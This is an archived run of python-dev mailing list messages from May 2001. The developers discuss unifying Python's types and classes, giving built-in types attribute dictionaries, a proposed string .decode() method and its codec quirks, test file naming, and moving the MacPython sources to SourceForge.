Jeremy From fdrake at cj42289-a.reston1.va.home.com Fri May 11 00:47:14 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 18:47:14 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update for the maintenance version docs. From fdrake at cj42289-a.reston1.va.home.com Fri May 11 01:04:40 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 19:04:40 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for the development version of the docs. From guido at digicool.com Fri May 11 02:03:13 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 19:03:13 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST." <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Glad somebody is watching what I'm doing here -- I was afraid I was having too much fun by myself! :-) > -------- Original Message -------- > Log Message: > > Make attributes of subtypes writable, but only for dynamic subtypes > derived in Python using a class statement; static subtypes derived in > C still have read-only attributes. > -------- Original Message -------- > > I would like to argue that "plain old C types" should act as if they > have __dict__s for consistency with other types. Good point. Plain old types currently (in the descr-branch) have a readonly dict (using a proxy) and no settable attributes. 
I will probably give types settable attributes in a next revision, but I prefer not to make the type's dict writable -- I need to be able to watch the setattr calls so that if someone changes DictType.__getitem__ I can change the mp_subscript to a C function that calls the __getitem__ method. For speed reasons, if you don't override them, the C tp_slot functions carry out the operation directly, and the __slot__ methods call the C tp_slot functions; but when __slot__ is overridden, tp_slot must call __slot__. > It is sometimes useful > to be able to annotate objects by adding attributes to them. But this > only works with class instance objects, not instances of types. > > Paul Prescod If you're talking about *instances*: instances of subtypes of built-in types have a dict of their own to which you can add stuff to your heart's content. Instances of built-in types will continue not to have a dict (it would cost too much space if *every* object had a dict, even if it was a NULL pointer when no attrs are defined). If you mean you want to annotate types like you can annotate classes, that should be possible once I implement what I describe above. --Guido van Rossum (home page: http://www.python.org/~guido/) From paulp at ActiveState.com Fri May 11 01:22:16 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 16:22:16 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com> Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com> Jeremy Hylton wrote: > > >>>>> "PP" == Paul Prescod writes: > > PP> I would like to argue that "plain old C types" should act as if > PP> they have __dict__s for consistency with other types. It is > PP> sometimes useful to be able to annotate objects by adding > PP> attributes to them. But this only works with class instance > PP> objects, not instances of types. > > Every type should have an __dict__ of type dict? 
Then every dict > must have an __dict__, including the __dict__ of __dict__? What's wrong with that? Every object has a type, even type objects, and type types. It only becomes a problem if you try to recursively walk all the dictionaries in the system adding information to them. Otherwise they have null pointers that "act as if" they were empty dictionaries. > Once every object has an __dict__, every object will be mutable. Then > no object will be usable as a dict key and we can get rid of dicts > entirely. According to that argument, instances cannot be dictionary keys. That is simply not true. Objects do not implement their hash functions in terms of ALL of their attributes! -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mwh at python.net Fri May 11 01:31:53 2001 From: mwh at python.net (Michael Hudson) Date: Fri, 11 May 2001 00:31:53 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10 Message-ID: This is a summary of traffic on the python-dev mailing list between Apr 26 and May 9 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list at python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. This is the seventh summary written by Michael Hudson.
Summaries are archived at:

Posting distribution (with apologies to mbm), articles per day; number of articles in summary: 228. Thu 26: 7, Fri 27: 24, Sat 28: 10, Sun 29: 1, Mon 30: 10, Tue 01: 10, Wed 02: 44, Thu 03: 23, Fri 04: 19, Sat 05: 10, Sun 06: 2, Mon 07: 12, Tue 08: 17, Wed 09: 39.

A fairly quiet, but interesting fortnight (and I don't mean the sarcastic replies to the Homepage virus). A few build problems and bugs fixed, and one very involved discussion (cf. most of the rest of this summary). * type == class? * Guido posted a message from Jim Althoff describing the metaclass system used in Smalltalk: He also mentioned a problem that is bound to bite any attempt to heal the type/class split in Python. If there are to be no special cases in the type system then classes and types in particular should be instances. This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

The code is hoping that, as in today's Python, DictType.__repr__ will return an unbound method - the __repr__ method of vanilla dictionaries, so that output of the form MyDictType({1:2}) will be given. But DictType is now an instance, so there's another interpretation for DictType.__repr__ - the bound DictType's own __repr__ method! This is a fundamental problem; currently "class.attr" and "instance.attr" have different meanings in Python, and any attempt to conflate the notions of "class" and "instance" is bound to run aground.
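For comparison, here is a minimal sketch of how this ambiguity was eventually settled in Python 3, long after this thread and not the descr-branch code under discussion; `dict` stands in for `DictType`. It assumes Python 3 semantics: for a non-data attribute such as `__repr__`, lookup on a class searches the class's own MRO before its metaclass, so `dict.__repr__` still means the instance-level repr; `super()` covers the "call the overridden method" use that unbound methods mainly served; and a plain function fetched from a class is no longer wrapped as an unbound method. `MyDictType2`, `C` and `i` are illustrative names.

```python
class MyDictType(dict):
    def __repr__(self):
        # dict.__repr__ is found in dict's own namespace (its MRO), so this is
        # the repr that dict instances use, not the repr of the type object.
        return "MyDictType(%s)" % dict.__repr__(self)


class MyDictType2(dict):
    def __repr__(self):
        # super() reaches the overridden method without naming the base class.
        return "MyDictType2(%s)" % super().__repr__()


print(repr(MyDictType({1: 2})))    # MyDictType({1: 2})
print(repr(MyDictType2({1: 2})))   # MyDictType2({1: 2})

# The type object's own repr comes from its metaclass, type.
print(type(dict).__repr__(dict))   # <class 'dict'>


# How a function is returned depends on where lookup finds it.
class C:
    def f(self):
        return "f"


i = C()
i.g = lambda: "g"
print(type(i.g).__name__)  # function: found directly on the instance
print(type(i.f).__name__)  # method: found via i.__class__, so bound
print(type(C.f).__name__)  # function: Python 3 has no unbound methods
```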
Guido proposed some hairy disambiguation rules in the above-linked message, but no-one was particularly enthused about them, possibly because no-one could really get their head round them. The long term solution is to change the syntax for getting - or removing entirely - unbound methods. As far as anyone can make out, all that unbound methods are used for is calling superclasses' methods from overriding methods, so if one can find another way of spelling that, then removing unbound methods entirely could be contemplated. So the discussion on that went around for a bit, with no really new compelling ideas surfacing. There was some support for some kind of souped up super.foo() construct: To me, the most plausible ideas came from Thomas Heller: and from Paul Dubois, who suggested nicking the feature renaming feature from Eiffel: though the best syntax for the latter is far from clear. There's also the king-sized issue of backwards compatibility; to a first degree of approximation, *all* Python code that uses inheritance would need to be updated to accommodate changes in the meaning of "class.attribute". Another __future__ statement, maybe? * data.decode * Marc-Andre Lemburg asked if it might be an idea if string objects sprouted an .decode method: After some umming and arring and accusations of bloat, this got BDFL approval, and should appear in CVS imminently. * Moving MacPython to sourceforge * Jack Jansen posted notice that he intends to move the MacPython code over to sourceforge: It will be nice to finally have all the code in the same place! Cheers, M. From paulp at ActiveState.com Fri May 11 02:26:43 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 17:26:43 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Message-ID: <3AFB31C3.5CEF9064@ActiveState.com> Guido van Rossum wrote: > >... > > Good point.
Plain old types currently (in the descr-branch) have a > readonly dict (using a proxy) and no settable attributes. I will > probably give types settable attributes in a next revision, but I > prefer not to make the type's dict writable -- I need to be able to > watch the setattr calls so that if someone changes > DictType.__getitem__ I can change the mp_subscript to a C function > that calls the __getitem__ method. I'm happy to have you look and see if I'm setting something magical. But if I'm not, I would like you to just add the thing I made to an internal private dictionary and remember it. I think that's what you are talking about. >... > If you're talking about *instances*: instances of subtypes of built-in > types have a dict of their own to which you can add stuff to your > heart's content. Instances of built-in types will continue not to > have a dict (it would cost too much space if *every* object had a > dict, even if it was a NULL pointer when no attrs are defined). Darn. That *is* what I was hoping for. There is an implementation that is slowish if you use it, but has little cost if you don't: keep a big dict mapping object pointers to their associated dictionaries (if any). For purposes of discussion, call it sys._associations. Then have the getattr on "PyObject" look in this dict of dicts for attributes that it can't otherwise find, and setattr construct dictionaries in the dict of dicts if necessary. That's the usual workaround anyhow so this would be a nicer syntax and a more orthogonal model. Price: a hasattr that would return false or getattr that would raise AttributeError would be a little slower. They would have to check the dictionary of dictionaries before deciding that they really don't have the attribute. -- Take a recipe. Leave a recipe. Python Cookbook!
http://www.ActiveState.com/pythoncookbook From guido at digicool.com Fri May 11 03:57:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 20:57:36 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST." <3AFB31C3.5CEF9064@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com> > > Good point. Plain old types currently (in the descr-branch) have a > > readonly dict (using a proxy) and no settable attributes. I will > > probably give types settable attributes in a next revision, but I > > prefer not to make the type's dict writable -- I need to be able to > > watch the setattr calls so that if someone changes > > DictType.__getitem__ I can change the mp_subscript to a C function > > that calls the __getitem__ method. > > I'm happy to have you look and see if I'm setting something magical. But > if I'm not, I would like you to just add the thing I made to an internal > private dictionary and remember it. I think that's what you are talking > about. OK, we agree on this one. > >... > > If you're talking about *instances*: instances of subtypes of built-in > > types have a dict of their own to which you can add stuff to your > > heart's content. Instances of built-in types will continue not to > > have a dict (it would cost too much space if *every* object had a > > dict, even if it was a NULL pointer when no attrs are defined). > > Darn. That *is* what I was hoping for. > > There is an implementation that is slowish if you use it, but has little > cost if you don't: keep a big dict mapping object pointers to their > associated dictionaries (if any). For purposes of discussion, call it > sys._associations. 
Then have the getattr on "PyObject" look in this dict > of dicts for attributes that it can't otherwise find, and setattr > construct dictionaries in the dict of dicts if necessary. > > That's the usual workaround anyhow so this would be a nicer syntax and a > more orthogonal model. > > Price: a hasattr that would return false or getattr that would raise > AttributeError would be a little slower. They would have to check the > dictionary of dictionaries before deciding that they really don't have > the attribute. Personally, if you want this outrageous implementation, you should be paying for it, not the infrastructure. It feels contrary to Python's treatment of objects. I don't like elaborate workarounds in the implementation like this -- probably because the performance model becomes muddy. --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Fri May 11 03:05:11 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 11 May 2001 13:05:11 +1200 (NZST) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com> Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz> Paul Prescod : > Otherwise > they have null pointers that "act as if" they were empty > dictionaries. Actually, they need to act as if they were empty except for a "__dict__" slot which contains another one of these magic things. :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From barry at digicool.com Fri May 11 05:45:38 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 10 May 2001 23:45:38 -0400 Subject: [Python-Dev] Interview with Mark Lutz Message-ID: <15099.24674.311472.184935@anthem.wooz.org> Great interview with Mark on the ORA site, linked from /.
http://python.oreilly.com/news/python_0501.html -Barry From fredrik at effbot.org Fri May 11 07:57:34 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 07:57:34 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid> barry wrote: > Great interview with Mark on the ORA site, linked from /. > > http://python.oreilly.com/news/python_0501.html you mean that python-devers read slashdot for python news, when you have the daily url: http://www.pythonware.com/daily Cheers /F From thomas at xs4all.net Fri May 11 11:02:26 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 11 May 2001 11:02:26 +0200 Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400 References: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Message-ID: <20010511110226.M16486@xs4all.nl> On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote: [ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets bitten in the derriere ] > This begs the question, though -- should tests that create temp > files check that the files don't already exist, and fail with a more > descriptive error if they do? I'd think so, yes. I'd also suggest nothing uses something as lamenamed as 'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the first account :) How about mmap calls its test-testfile 'test_mmap.foo' ? -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Fri May 11 11:34:25 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:34:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AFBB221.F29BCB9A@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > I've attached the patch. Due to a small reorganisation the patch is > > a little longer -- symmetry has its price at C level too ;-) > > I may be being dense, but can you explain what's going on here: > > ->> u'\u00e3'.encode('latin-1') > '\xe3' > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > Traceback (most recent call last): > File "<stdin>", line 1, in ? > UnicodeError: ASCII encoding error: ordinal not in range(128) The string.decode() method will try to reuse the Unicode codecs here. To do this, it will have to convert the string to Unicode first and this fails due to the character not being in the ASCII range. > Can you come up with some other example I can use in tomorrow's > python-dev summary? I will add some codecs which make the .decode() method useful next week. The ones I have in mind are base64, hex and some of the other binascii codecs. Also, the ROT13 codec I posted will go into the core as a simple example. With those you will be able to write: data.encode('base64').decode('base64') and get back data. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Fri May 11 11:43:14 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 11:43:14 +0200 Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid> mal wrote: > > I may be being dense, but can you explain what's going on here: > > > > ->> u'\u00e3'.encode('latin-1') > > '\xe3' > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > Traceback (most recent call last): > > File "<stdin>", line 1, in ? > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > The string.decode() method will try to reuse the Unicode > codecs here. To do this, it will have to convert the string > to Unicode first and this fails due to the character not being > in the ASCII range. can you take that again? shouldn't michael's example be equivalent to: unicode(u"\u00e3".encode("latin-1"), "latin-1") if not, I'd argue that your "decode" design is broken, instead of just buggy... Cheers /F From mal at lemburg.com Fri May 11 11:50:24 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:50:24 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid> Message-ID: <3AFBB5E0.620710C8@lemburg.com> Fredrik Lundh wrote: > > barry wrote: > > > Great interview with Mark on the ORA site, linked from /. > > > > http://python.oreilly.com/news/python_0501.html > > you mean that python-devers read slashdot for python news, > when you have the daily url: > > http://www.pythonware.com/daily I just bought one of those nice machines that can run pippy and was wondering how to get AvantGo (the channel software that comes with it) to synchronize with your daily URL... wouldn't it be possible to set up a channel for this ?
The AvantGo channels can be registered at their site (http://www.avantgo.com), but the contents would have to be "mobile friendly"... anyway, just a thought ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 11 12:07:40 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 12:07:40 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> Message-ID: <3AFBB9EC.F75C158D@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > > I may be being dense, but can you explain what's going on here: > > > > > > ->> u'\u00e3'.encode('latin-1') > > > '\xe3' > > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > > Traceback (most recent call last): > > > File "<stdin>", line 1, in ? > > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > > > The string.decode() method will try to reuse the Unicode > > codecs here. To do this, it will have to convert the string > > to Unicode first and this fails due to the character not being > > in the ASCII range. > > can you take that again? shouldn't michael's example be > equivalent to: > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > if not, I'd argue that your "decode" design is broken, instead > of just buggy... Well, it is sort of broken, I agree. The reason is that PyString_Encode() and PyString_Decode() guarantee the returned object to be a string object. To be able to reuse Unicode codecs I added code which converts Unicode back to a string in case the codec returns a Unicode object (which the .decode() method does). This is what's failing.
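As a point of comparison, here is a short sketch of where this ended up in Python 3, not the 2001 patch being discussed. Text and bytes are separate types, so Michael's latin-1 round trip works directly, while bytes-to-bytes transforms such as base64 (and str-to-str ones such as rot13) are reached through `codecs.encode()` / `codecs.decode()` rather than through a `.decode()` method on the data. It assumes a recent Python 3 (3.4 or later), where these codec aliases are available through those functions.

```python
import codecs

# A real text encoding round trip: str -> bytes -> str.
# Python 3 decodes the bytes directly; there is no implicit ASCII detour.
raw = "\u00e3".encode("latin-1")   # b'\xe3'
text = raw.decode("latin-1")       # 'ã'

# base64 maps bytes to bytes, so it is not offered as a str/bytes method;
# the generic codecs.encode()/codecs.decode() functions reach it instead.
data = b"some binary data"
encoded = codecs.encode(data, "base64")
decoded = codecs.decode(encoded, "base64")

# rot13 maps str to str and is reachable the same way.
scrambled = codecs.encode("hello", "rot13")

print(raw, text, decoded == data, scrambled)
```

MAL's `data.encode('base64').decode('base64')` therefore becomes `codecs.decode(codecs.encode(data, "base64"), "base64")` in this later API.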
Perhaps I should simply remove the restriction and have both APIs return the codec's return object as-is ?! (I would be in favour of this, but I'm not sure whether this is already in use by someone...) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 11 15:31:18 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 08:31:18 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST." <200105110157.UAA03123@cj20424-a.reston1.va.home.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> <200105110157.UAA03123@cj20424-a.reston1.va.home.com> Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> > > > Good point. Plain old types currently (in the descr-branch) have a > > > readonly dict (using a proxy) and no settable attributes. I will > > > probably give types settable attributes in a next revision, but I > > > prefer not to make the type's dict writable -- I need to be able to > > > watch the setattr calls so that if someone changes > > > DictType.__getitem__ I can change the mp_subscript to a C function > > > that calls the __getitem__ method. Alas, I think I'll have to withdraw this promise for now. The truly built-in types are static objects that are shared between all interpreter instances within one process, and each type has only one dictionary pointer. So changes to the __dict__ would affect other interpreter instances, and that's unacceptable. I've thought about alternatives; I can't give each interpreter its own set of types because sometimes objects are shared between interpreters (e.g. the dictionary of interned strings), and then their types have to be shared too!
Not having any object sharing would mean too much of a change to the foundations of the implementation. I think we'll have to live with this restriction until Python 3000. Personally, I don't mind -- I see mostly possible abuses for the ability to change attributes of e.g. DictType or StringType. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g at Virginia.EDU Fri May 11 15:43:32 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 09:43:32 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com> Message-ID: Catching up on this thread -- mostly because it looks like I'm going to have to use ExtensionClass to make pyobjc classes into python classes rather than types -- you can add that to the list of real world uses of Don's Metaclass hack that Tim questioned. Reading up on MetaClasses in Smalltalk again makes me appreciate the simplicity of a prototype system where everything is just an object -- all objects can be cloned, and some objects are only used for cloning -- they are the exemplars of their type which fill the role of Classes. Unfortunately, although prototypes would be a lot simpler, it would be a pretty incompatible change for Python -- I can't think of any way to get there without a lot of breakage. (Still -- I wonder if there's a way they could be used under the covers in the implementation to make it simpler. Prototype semantics are basically a superset of Class based semantics, which is how it was easy to do Smalltalk in Self.) Classes are necessary for statically typed O-O languages, but IMHO, make a lot less sense for dynamic languages. If Py3K were to be a clean start, I'd urge basing it on prototypes, but as an incremental creation -- I don't know how to get there from here (unless it could sneak in under the implementation covers!)
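To make the prototype idea concrete, here is a minimal Python sketch, not taken from Self or XlispStat: each object keeps its own slots plus a single parent slot, a failed attribute lookup is delegated up the parent chain, and a "method" is just a slot holding a function that gets called with the original receiver. `Proto`, `clone` and `send` are hypothetical names, and real prototype systems (XlispStat's allows multiple parents, for instance) do considerably more.

```python
class Proto:
    """A minimal prototype object: slots live on the object itself, and
    lookups that fail are delegated to a single parent object."""

    def __init__(self, parent=None, **slots):
        self.__dict__["_parent"] = parent
        self.__dict__.update(slots)

    def __getattr__(self, name):
        # Only called when normal lookup fails: walk up the parent chain.
        parent = self.__dict__["_parent"]
        if parent is None:
            raise AttributeError(name)
        return getattr(parent, name)

    def clone(self, **slots):
        # A clone holds only the slots it overrides; the rest is inherited.
        return Proto(parent=self, **slots)

    def send(self, name, *args):
        # Find the slot anywhere along the chain, but call it with the
        # original receiver as 'self' (delegation, not forwarding).
        return getattr(self, name)(self, *args)


point = Proto(x=0, y=0, describe=lambda self: "(%d, %d)" % (self.x, self.y))
p = point.clone(x=3)

print(p.send("describe"))      # (3, 0)
print(point.send("describe"))  # (0, 0)
```

Because `send` passes the original receiver, `p.send("describe")` sees `p.x == 3` even though `describe` lives on `point`; that delegation rule is what lets class-like behaviour be layered on top of prototypes.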
BTW: XlispStat, which has a prototype object system with multiple inheritance also doesn't have "super" -- there is a (call-next-method [ args... ]) function/macro which searches for the base classes. I'm sure there's a lower level function to just get the next method, but typically, call-next-method is what's used. There is no search for non-method attributes, as all of the base class instance vars are merged and made into slots of the instance itself. (There are no class variables -- there are no classes.) The closest python equivalent would be, as has been discussed in this thread, a super method or function that does attribute lookup on the bases. -- Steve Majewski From nas at python.ca Fri May 11 16:06:39 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 11 May 2001 07:06:39 -0700 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: ; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700 References: Message-ID: <20010511070639.A1402@glacier.fnational.com> noreply at sourceforge.net wrote: > Module objects currently don't define the tp_getattro > or tp_setattro slots. As a result, interning of > attribute names does them no good: a char* is always > passed, so the dict lookup always needs to do a string > compare despite that the attribute name is interned. I think this is a problem in classobject.c:generic_binary_op as well. PyObject_GetAttrString is always used. I believe the old code interned names like "__add__" and used PyObject_GetAttr. Is it worth fixing this? Neil From guido at digicool.com Fri May 11 17:13:56 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 11 May 2001 10:13:56 -0500 Subject: [Python-Dev] Re: Change module attribute get & set In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST."
<20010511070639.A1402@glacier.fnational.com> References: <20010511070639.A1402@glacier.fnational.com> Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com> > I think this is a problem in classobject.c:generic_binary_op as > well. PyObject_GetAttrString is always used. I believe the old > code interned names like "__add__" and used PyObject_GetAttr. Is > it worth fixing this? Maybe. I'd give this low priority. If my descriptor branch work goes well, most of classobject.c *may* disappear in favor of the newly swollen typeobject.c. ;-) --Guido van Rossum (home page: http://www.python.org/~guido/) From jack at oratrix.nl Fri May 11 16:29:24 2001 From: jack at oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:29:24 +0200 Subject: [Python-Dev] Mac CVS repository moved to sourceforge Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl> Folks, the Python/Mac repository has been moved to sourceforge, and is integrated with the general Python repository, so from now on a single CVS tree suffices to build MacPython. I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more weeks and then it'll disappear. Note that the pythoncvs.oratrix.nl repository is still the source for some of the optional libraries you need to build MacPython, but that's only if you want to build it completely from CVS. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From martin at loewis.home.cs.tu-berlin.de Fri May 11 16:41:33 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 11 May 2001 16:41:33 +0200 Subject: [Python-Dev] Mac hierarchy backwards Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> First, thanks to Jack Jansen for integrating the Mac sources; this is a good thing.
It seems, however, that some of the directory structure is backwards: Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There may be others of this kind. I also wonder whether all these files are still needed, and meant to be distributed. E.g. I see chdir.c having the comment /* Chdir for the Macintosh. Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). Pathnames must be Macintosh paths, with colons as separators. */ Is it really the case that the Mac API hasn't grown a chdir call in 13 years? Regards, Martin From fdrake at acm.org Fri May 11 16:55:33 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 11 May 2001 10:55:33 -0400 (EDT) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com> Martin v. Loewis writes: > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. I agree that this should be the goal; I don't know if Jack's release procedure would need to be revised before that can happen. If so, I'd encourage him to do so. > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Yikes! I just searched developer.apple.com for "chdir" and came up with no hits, but I really don't know just what that tells me. chdir() is required for POSIX compliance, but it isn't mentioned in the C9X final committee draft. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From jack at oratrix.nl Fri May 11 16:56:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Fri, 11 May 2001 16:56:39 +0200 Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: Message by "Martin v.
Loewis" , Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl> > It seems, however, that some of the directory structure is backwards: > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There > may be others of this kind. Yes, now that the Mac stuff is integrated with the mainstream again this might be a good idea. > I also wonder whether all these files are still needed, and meant to > be distributed. E.g. I see chdir.c having the comment > > /* Chdir for the Macintosh. > Public domain by Guido van Rossum, CWI, Amsterdam (July 1987). > Pathnames must be Macintosh paths, with colons as separators. */ > > Is it really the case that the Mac API hasn't grown a chdir call in 13 > years? Hmm, hmm, I'm unsure. MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current directories (by design. Whether I agree with the design is a different matter:-). Normally MacPython is built with a special unix-compatibility library, GUSI, which does provide these calls. However, it is still possible to build without GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in its MacOS API model") I've used these compatibility routines again, until I finally got GUSI ported. But it's easy enough to cvs-remove them from the normal tree, to be revived when needed. What do people think? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From pedroni at inf.ethz.ch Fri May 11 16:56:48 2001 From: pedroni at inf.ethz.ch (Samuele Pedroni) Date: Fri, 11 May 2001 16:56:48 +0200 